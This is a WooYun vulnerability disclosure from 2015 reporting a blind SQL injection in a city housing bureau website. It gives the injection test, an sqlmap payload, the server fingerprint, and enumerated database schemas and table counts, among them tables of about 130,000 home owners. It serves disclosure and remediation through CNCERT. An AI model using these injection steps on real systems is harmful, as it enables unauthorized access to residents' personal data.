当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160456

漏洞标题:平顶山房管局又一处SQL注入(十三万的房屋所有者信息)

相关厂商:平顶山房管局

漏洞作者: 默之

提交时间:2015-12-11 17:56

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

太费时间了

详细说明:

http://**.**.**.**/public/ZJJGInfo.aspx?code=176021


and 1=1 返回正常,and 1=2.没有数据返回
存在注入

---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=176021 AND 1085=1085
---
[16:10:59] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle


共20个数据库,房管局的数据库还是有很多住房人的信息的,不过没有找出来,但是找到了大量的房屋信息

[*] apex_030200
[*] appqossys
[*] ctxsys
[*] dbsnmp
[*] exfsys
[*] flows_files
[*] mdsys
[*] olapsys
[*] orddata
[*] ordsys
[*] outln
[*] owbsys
[*] scott
[*] sys
[*] sysman
[*] system
[*] wmsys
[*] wsbalog
[*] wsbayt
[*] xdb


漏洞证明:

Database: ORDDATA
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| ORDDCM_DICT_ATTRS        | 2418    |
| ORDDCM_STD_ATTRS         | 2415    |
| ORDDCM_UID_DEFS          | 245     |
| ORDDCM_CT_LOCATORPATHS   | 95      |
| ORDDCM_CT_DAREFS         | 72      |
| ORDDCM_CT_PRED           | 61      |
| ORDDCM_CT_PRED_OPRD      | 53      |
| ORDDCM_INTERNAL_TAGS     | 42      |
| ORDDCM_ANON_ATTRS        | 37      |
| ORDDCM_VR_DT_MAP         | 32      |
| ORDDCM_PREFS_LOOKUP      | 13      |
| ORDDCM_RT_PREF_PARAMS    | 13      |
| ORDDCM_CT_PRED_SET       | 9       |
| ORDDCM_DOCS              | 9       |
| ORDDCM_INSTALL_DOCS      | 9       |
| ORDDCM_DOC_TYPES         | 8       |
| ORDDCM_CT_ACTION         | 7       |
| ORDDCM_DOC_REFS          | 7       |
| ORDDCM_ANON_ACTION_TYPES | 4       |
| ORDDCM_ANON_RULE_TYPES   | 3       |
| ORDDCM_ANON_RULES        | 3       |
| ORDDCM_CT_PRED_PAR       | 3       |
| ORDDCM_PRV_ATTRS         | 3       |
| ORDDCM_CT_MACRO_PAR      | 2       |
| ORDDCM_CT_MACRO_DEP      | 1       |
| ORDDCM_DATA_MODEL        | 1       |
| ORDDCM_MAPPING_DOCS      | 1       |
+--------------------------+---------+


大量的数据

Database: WSBAYT
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| WSBA_UPLOADFILE         | 375023  |上传文件
| HPMS_ROOM               | 138098  |
| NWRS_SPFOWNER           | 132130  |商品房住户
| LINK_YSSQ_ROOM          | 129938  |
| LINK_ROOM_CERT          | 118348  |
| NWRS_SELLBARGAIN_HTBA   | 82154   |
| LINK_BARGAIN_ROOM       | 75091   |
| LINK_MSG_RECEIVER       | 74353   |
| NWRS_SELLBARGAIN        | 73173   |
| PUBLIC_VISITOR          | 54272   |
| DK_HPMS_ROOM            | 34552   |
| TEST1                   | 32126   |
| TEST2                   | 30187   |
| SFSS_EXCHANGEMES        | 23800   |
| SWRS_CQ_OWNER           | 22963   |
| HPMS_YSSQDOCUMENT       | 21845   |
| SFSS_OBJECTION          | 21768   |
| LINK_YSSQDOC_FILE       | 20688   |
| SWRS_LINK_BARGAIN_ROOM  | 19635   |
| SWRS_SELLBARGAIN_HTBA   | 19629   |
| SWRS_SELLBARGAIN        | 19557   |
| SWRS_CQ_ROOM            | 19429   |
| SWRS_WTBARGAIN          | 19369   |
| SWRS_ISSUE              | 19289   |
| SWRS_CQ_PROPERTY        | 19173   |
| SFSS_JGSQ               | 15486   |
| SFSS_ACCOUNT            | 15383   |
| SFSS_SUPERVISEBARGAIN   | 15383   |
| NWRS_BGSQ               | 14333   |
| SFSS_DEPOSIT            | 12746   |
| WSBA_MESSAGE            | 12590   |
| LINK_BUILD_CERT         | 12200   |
| SFSS_DRAW               | 10685   |
| XTSZ_DAYSERIAL          | 5589    |
| SYS_IMPORT_FULL_01      | 4201    |
| BAK_LINK_ROOM_CERT      | 2802    |
| DK_BUILD_UNIT           | 2228    |
| NWRS_TFSQ               | 1907    |
| SPF_AJBADJSQB           | 1905    |
| HPMS_BUILD              | 1730    |
| BAK_ROOM_VFWID          | 1532    |
| BAK_NWRS_SELLBARGAIN    | 1498    |
| LINK_OLDFWZTSQ_ROOMCODE | 1484    |
| SWRS_TFSQ               | 1468    |
| DK_HTBG_REL             | 1365    |
| HPMS_YSSQ               | 1260    |
| HPMS_YSXKZ              | 1240    |
| SFSS_TOTALACCOUNT       | 1215    |
| LINK_ROOM_CERT_DEL      | 1004    |
| NWRS_SELLBARGAINMB      | 742     |
| LINK_XSRY_PROJECT       | 564     |
| XTSZ_USER               | 554     |
| HPMS_JSGCGHXKZ          | 552     |
| HPMS_JZGCSGXKZ          | 548     |
| HEMS_PERSON             | 536     |
| XTSZ_MKQX               | 514     |
| HPMS_JSYDGHXKZ          | 511     |
| HPMS_TDSYQZ             | 493     |
| XTSZ_CODEB              | 423     |
| HPMS_PROJECT            | 372     |
| SFSS_BGSQ               | 337     |
| SFSS_CXSQ               | 325     |
| HEMS_COMPANY            | 304     |
| XTSZ_MK                 | 251     |
| DK_HEMS_PERSON          | 239     |
| HPMS_OLD_BAZXSQ         | 235     |
| TMP_FWID_OFWID          | 159     |
| HPMS_OLD_LPDR_FW        | 140     |
| DK_BUILD_PROJECTCODEIS0 | 108     |
| HPMS_OLD_LPDR_OFW       | 97      |
| SWRS_LEASEBARGAIN       | 96      |
| HPMS_OLD_LPDR           | 83      |
| HPMS_GCXXJD             | 82      |
| DK_HEMS_COMPANY         | 78      |
| HEMS_QYXXBGSQ           | 74      |
| XTSZ_CBC                | 73      |
| XTSZ_MKFL               | 68      |
| HPMS_BUILDTABLE_CACHE   | 61      |
| HPMS_OLD_ZJZXSQ         | 53      |
| XTSZ_UCCOMPANY          | 52      |
| HPMS_OLD_CFSQ           | 51      |
| NFSS_SPECIALXKZ         | 48      |
| NFSS_SPECIALXKZLOG      | 48      |
| XTSZ_UCPERSON           | 45      |
| NWRS_BOOKBARGAIN        | 35      |
| XTSZ_FORMINFO           | 34      |
| HPMS_OLD_AJZXSQ         | 33      |
| IMP_OLDBUILDS           | 31      |
| XTSZ_FIELDCONFIG        | 31      |
| XTSZ_SYSROLCACHE        | 31      |
| DOFF_ACCOUNTLINKMETHOD  | 29      |
| HPMS_OLD_XZSQ           | 29      |
| HPMS_OLD_CFZXSQ         | 28      |
| HPMS_YSSQZL_TEMPLATE    | 17      |
| HPMS_XMDHXX             | 16      |
| XTSZ_ROLE               | 14      |
| XTSZ_SERIALCONFIG       | 14      |
| NWRS_BARGAIN_TEMPLATE   | 12      |
| XTSZ_COMPANY_NOPUB      | 10      |
| YW_CODEB                | 9       |
| XTSZ_SYSTEM             | 8       |
| HPMS_YSXKZ_DEL          | 7       |
| XTSZ_QUERYCODE          | 7       |
| XTSZ_KEYLOG             | 5       |
| XTSZ_TREECACHE          | 5       |
| XTSZ_UCCONFIGTREEINFO   | 5       |
| XTSZ_YEARSERIAL         | 5       |
| DOFF_ACCOUNT            | 4       |
| LINK_KFQYDLS_LICENCE    | 3       |
| NWRS_SBSUPPLY           | 3       |
| HPMS_YSXKZ_YSJGZH       | 2       |
| LINK_JGSQ_YSJGZH        | 2       |
| NFSS_BANKNET            | 2       |
| NFSS_JGSQ               | 2       |
| SFSS_INTERESTRATE       | 2       |
| XTSZ_ENTERMODULE        | 2       |
| LINK_PROJECT_SPECIALKQY | 1       |
| PUBLIC_BACKINFO         | 1       |
| SWRS_LEASEBARGAINHTBA   | 1       |
| YW_CBC                  | 1       |
+-------------------------+---------+


Database: CTXSYS
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| DR$OBJECT_ATTRIBUTE     | 512     |
| DR$DBO                  | 362     |
| DR$NUMBER_SEQUENCE      | 256     |
| DR$OBJECT_ATTRIBUTE_LOV | 168     |
| DR$INDEX_VALUE          | 86      |
| DR$STOPWORD             | 76      |
| DR$OBJECT               | 53      |
| DR$INDEX_OBJECT         | 36      |
| DR$PARAMETER            | 33      |
| DR$PREFERENCE           | 30      |
| DR$PREFERENCE_VALUE     | 20      |
| DR$FEATURE_USED         | 17      |
| DR$CLASS                | 13      |
| DR$SECTION_GROUP        | 5       |
| DR$INDEX                | 4       |
| DR$STOPLIST             | 3       |
| DR$INDEX_SET            | 1       |
+-------------------------+---------+

修复方案:

这个网站注入比较多,建议线下测试好了更换新系统

版权声明:转载请注明来源 默之@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-15 15:00

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由河南分中心后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价